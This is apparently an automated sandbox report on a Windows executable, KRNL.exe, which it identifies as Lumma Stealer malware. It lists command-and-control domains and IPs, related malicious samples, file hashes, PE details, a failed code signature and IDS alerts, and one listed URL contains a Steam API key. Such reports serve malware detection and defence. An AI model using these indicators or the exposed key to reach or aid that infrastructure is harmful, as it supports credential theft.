                                                                                                                                                                                      https://checkout.steampowKRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://help.steampowered.com/en/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://steamcommunity.com/market/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://store.steampowered.com/news/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://lev-tolstoi.com/apiulKRNL.exe, 00000002.00000003.1751845531.00000000033EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://lev-tolstoi.com/apimKRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://store.steampowered.com/subscriber_agreement/KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17KRNL.exe, 00000002.00000003.1723581632.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712083330.0000000005A9F000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712222118.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1723494603.0000000005A98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://recaptcha.net/recaptcha/;KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://steamcommunity.com/discussions/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://store.steampowered.com/stats/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://medal.tvKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://broadcast.st.dl.eccdnx.comKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngKRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
https://store.steampowered.com/steam_refunds/ | KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | high
http://x1.c.lencr.org/0 | KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmp | false | high
http://x1.i.lencr.org/0 | KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmp | false | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | KRNL.exe, 00000002.00000003.1712222118.0000000005A73000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a | KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmp | false | high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900 | KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.157.254 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1583085
Start date and time: 2025-01-01 21:27:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: KRNL.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/1@12/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 61
• Number of non-executed functions: 169
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.85.23.206, 4.175.87.197, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
15:27:56 | API Interceptor | 11x Sleep call for process: KRNL.exe modified
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    172.67.157.254Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                        Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                                                                                                                                            Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                                        • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                                                        http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        lev-tolstoi.comGz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        Crosshair-X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        steamcommunity.comGz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
GPU-Z.exe | malicious | LummaC, DarkTortilla, LummaC Stealer | 104.102.49.254
gdi32.dll | malicious | LummaC | 23.55.153.106
Loader.exe | malicious | LummaC | 23.55.153.106
Crosshair-X.exe | malicious | LummaC | 104.121.10.34
iien1HBbB3.exe | malicious | LummaC | 23.55.153.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | 01012025.html | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 172.67.198.102
CLOUDFLARENETUS | SET_UP.exe | malicious | LummaC | 104.21.112.1
CLOUDFLARENETUS | test.doc.bin.doc | malicious | Unknown | 104.21.21.16
CLOUDFLARENETUS | test.doc.bin.doc | malicious | Unknown | 104.21.21.16
CLOUDFLARENETUS | web44.mp4.hta | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | test.doc.bin.doc | malicious | Unknown | 104.21.21.16
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENETUS | qnUFsmyxMm.exe | malicious | LummaC | 172.67.219.133
CLOUDFLARENETUS | Gz1bBIg2Tw.exe | malicious | LummaC | 172.67.157.254
AKAMAI-ASUS | loligang.mips.elf | malicious | Mirai | 96.17.237.158
AKAMAI-ASUS | Gz1bBIg2Tw.exe | malicious | LummaC | 104.102.49.254
AKAMAI-ASUS | OXoeX1Ii3x.exe | malicious | Unknown | 104.102.49.254
AKAMAI-ASUS | OXoeX1Ii3x.exe | malicious | Unknown | 104.102.49.254
AKAMAI-ASUS | setup.exe | malicious | Unknown | 23.217.49.150
AKAMAI-ASUS | decrypt.exe | malicious | Unknown | 184.28.90.27
AKAMAI-ASUS | decrypt.exe | malicious | Unknown | 184.28.90.27
AKAMAI-ASUS | FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msg | malicious | Unknown | 104.102.34.241
AKAMAI-ASUS | decrypt.ps1 | malicious | Unknown | 184.28.90.27
AKAMAI-ASUS | EdYEXasNiR.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 104.102.49.254
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | malicious | LummaC | 172.67.157.254, 104.102.49.254
a0e9f5d64349fb13191bc781f81f42e1 | SET_UP.exe | malicious | LummaC | 172.67.157.254, 104.102.49.254
a0e9f5d64349fb13191bc781f81f42e1 | web44.mp4.hta | malicious | LummaC | 172.67.157.254, 104.102.49.254
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | malicious | LummaC | 172.67.157.254, 104.102.49.254
a0e9f5d64349fb13191bc781f81f42e1 | qnUFsmyxMm.exe | malicious | LummaC | 172.67.157.254, 104.102.49.254
a0e9f5d64349fb13191bc781f81f42e1 | Gz1bBIg2Tw.exe | malicious | LummaC | 172.67.157.254, 104.102.49.254
a0e9f5d64349fb13191bc781f81f42e1 | yTcaknrrb8.exe | malicious | LummaC | 172.67.157.254, 104.102.49.254
a0e9f5d64349fb13191bc781f81f42e1 | Active_Setup.exe | malicious | LummaC Stealer | 172.67.157.254, 104.102.49.254
a0e9f5d64349fb13191bc781f81f42e1 | Loader.exe | malicious | LummaC | 172.67.157.254, 104.102.49.254
a0e9f5d64349fb13191bc781f81f42e1 | Loader.exe | malicious | LummaC | 172.67.157.254, 104.102.49.254
No context
Process: C:\Users\user\Desktop\KRNL.exe
File Type: assembler source, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 14402
Entropy (8bit): 4.874636730022465
Encrypted: false
SSDEEP: 384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
MD5: DF0EFD0545733561C6E165770FB3661C
SHA1: 0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
SHA-256: A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
SHA-512: 3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
Malicious: false
Reputation: moderate, very likely benign file
Preview: AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B
File type: PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit): 7.565451721581941
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: KRNL.exe
File size: 567'848 bytes
MD5: 976a25d2fed5fc7c8700588a33c6826c
SHA1: cce0da8a52a534d6252e716f8476193587e84745
SHA256: a9345000b80b1dd7e5ab5f1491771d39230c83311a1f1b98502f07df453ef02c
SHA512: d00f6e9841175880be5083b950a62b97b5496f461cb96b51a9332166e90969871127cc056265f23d5f7692a886227045173ce6439a42eca9c1b31af4fc399564
SSDEEP: 12288:oYO6Dqzihouxpa+yWTKbuQ4bUJRNds4b/gCJPEO:tO6DThou2+yDbZkUJ3dsPIPt
TLSH: CDC4E1523691C0B2C5531A764A75D7795A3EFC200F22AAC793984BFDDEB02D14F31A2E
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ng..........................................@.................................G.....@.................................|j..<..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x4104a0
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0x676E98E6 [Fri Dec 27 12:09:10 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
                                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                        Import Hash:96d90e8808da099bc17e050394f447e7
                                                                                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                        Error Number:-2146869232
                                                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                                                        • 13/01/2023 00:00:00 16/01/2026 23:59:59
                                                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                                                        • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                                                        Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                                                                                                                                                                        Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                                                                                                                                                                        Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                                                                                                                                                                        Serial:0997C56CAA59055394D9A9CDB8BEEB56
Instruction
call 00007F0400E6275Ah
jmp 00007F0400E625BDh
mov ecx, dword ptr [0043B680h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F0400E62756h
test esi, ecx
jne 00007F0400E62778h
call 00007F0400E62781h
mov ecx, eax
cmp ecx, edi
jne 00007F0400E62759h
mov ecx, BB40E64Fh
jmp 00007F0400E62760h
test esi, ecx
jne 00007F0400E6275Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [0043B680h], ecx
not ecx
pop edi
mov dword ptr [0043B6C0h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [00436D00h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [00436CB8h]
xor dword ptr [ebp-04h], eax
call dword ptr [00436CB4h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [00436D50h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 0043CF48h
call dword ptr [00436D28h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F0400E69533h
add esp, 0Ch
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x36a7c          0x3c          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8d000          0x3fc         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x88400          0x2628        .bss
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x3f000          0x2744        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x32608          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x2ea98          0xc0          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x36c3c          0x184         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy               Characteristics
.text   0x1000           0x2b4ca       0x2b600   ebf84c6b836020b1a66433a898baeab7  False     0.5443702719740634   data       6.596404756541432     IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x2d000          0xc50c        0xc600    96e76e7ef084461591b1dcd4c2131f05  False     0.40260022095959597  data       4.741850626178578     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x3a000          0x3714        0x2800    d87fd4546a2b39263a028b496b33108f  False     0.29814453125        data       5.024681407682101     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls    0x3e000          0x9           0x200     1f354d76203061bfdd5a53dae48d5435  False     0.033203125          data       0.020393135236084953  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc  0x3f000          0x2744        0x2800    c7508b57e36483307c47b7dd73fc0c85  False     0.75166015625        data       6.531416896423856     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss    0x42000          0x4ac00       0x4ac00   2a12ee53d309eb20fe02fb4fac5edd43  False     1.0003298756270902   data       7.999404208479229     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x8d000          0x3fc         0x400     6a4851071664eb0d5787860b0928a2fa  False     0.4443359375         data       3.391431520369637     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x8d058 | 0x3a4 | data | English | United States | 0.44849785407725323
DLL | Import
KERNEL32.dll | AcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
USER32.dll | ShowWindow
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-01T21:27:58.265380+0100 | 2058582 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) | 1 | 192.168.2.4 | 63882 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.277210+0100 | 2058584 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) | 1 | 192.168.2.4 | 65221 | 1.1.1.1 | 53 | UDP
2025-01-01T21:27:58.287510+0100 | 2058586 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) | 1 | 192.168.2.4 | 59317 | 1.1.1.1 | 53 | UDP
